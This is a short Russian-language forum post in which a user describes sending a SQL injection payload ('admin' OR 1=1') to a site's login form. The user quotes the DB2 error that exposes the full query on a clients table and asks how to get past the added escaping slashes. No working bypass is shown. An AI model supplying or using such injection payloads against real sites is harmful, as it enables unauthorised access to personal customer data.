muse
Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
|
есть сайт http://site.com/index.php
на котором можно залогинится.
я посылаю следующий POST запрос
quote:
login=admin'+OR+1=1&password=qwerty
выдает следующую ошибку
quote:
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает…
кто что может посоветовать ???
|
вопрос о запросе - 
